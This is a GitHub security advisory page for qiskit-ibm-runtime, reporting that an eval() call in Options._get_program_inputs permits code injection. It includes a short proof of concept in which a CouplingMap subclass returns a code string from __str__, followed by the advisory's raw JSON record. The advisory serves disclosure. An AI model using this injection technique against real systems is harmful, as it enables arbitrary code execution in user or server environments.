GHSA-CQ96-9974-V8HM

Vulnerability from github – Published: 2024-03-20 15:41 – Updated: 2024-03-20 15:41
VLAI
Summary
Dynamic Variable Evaluation in qiskit-ibm-runtime
Details

Summary

An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

Details

https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140

PoC

A local exploit would be something like

from qiskit import transpiler

class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

Where print("external code") can be any arbitrary python code string.

Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:

from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)

This will print external code

Impact

Security vulnerability.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "qiskit-ibm-runtime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.11.0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-627"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-20T15:41:26Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Summary\n\nAn `eval()` method exists `Options._get_program_inputs`. This is bad in any case, but especially bad because `Options` are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.\n\n### Details\n\nhttps://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140\n\n### PoC\nA local exploit would be something like\n\n```python\nfrom qiskit import transpiler\n\nclass BadActor(transpiler.CouplingMap):\n    def __str__(self):\n        return \"print(\u0027external code\u0027)\"\n\n```\n\nWhere `print(\"external code\")` can be any arbitrary python code string.\n\nThen if you did a normal workflow and used a specifically constructed `CouplingMap` subclass like `BadActor` above:\n\n```python\nfrom qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler\nfrom qiskit import QuantumCircuit\n\ncmap = BadActor.from_line(42)\nservice = QiskitRuntimeService()\noptions = Options(optimization_level=1)\noptions.simulator = dict(coupling_map=cmap))\n\nbell = QuantumCircuit(2)\nbell.h(0)\nbell.cx(0, 1)\nbell.measure_all()\n\nwith Session(service=service, backend=\"ibmq_qasm_simulator\") as session:\n    sampler = Sampler(session=session, options=options).run(bell)\n```\n\nThis will print `external code`\n\n### Impact\n\nSecurity vulnerability.",
  "id": "GHSA-cq96-9974-v8hm",
  "modified": "2024-03-20T15:41:27Z",
  "published": "2024-03-20T15:41:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-cq96-9974-v8hm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime/commit/2e8c8c8df83ba310f52d1651a426bad879e0bd38"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Qiskit/qiskit-ibm-runtime"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dynamic Variable Evaluation in qiskit-ibm-runtime"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…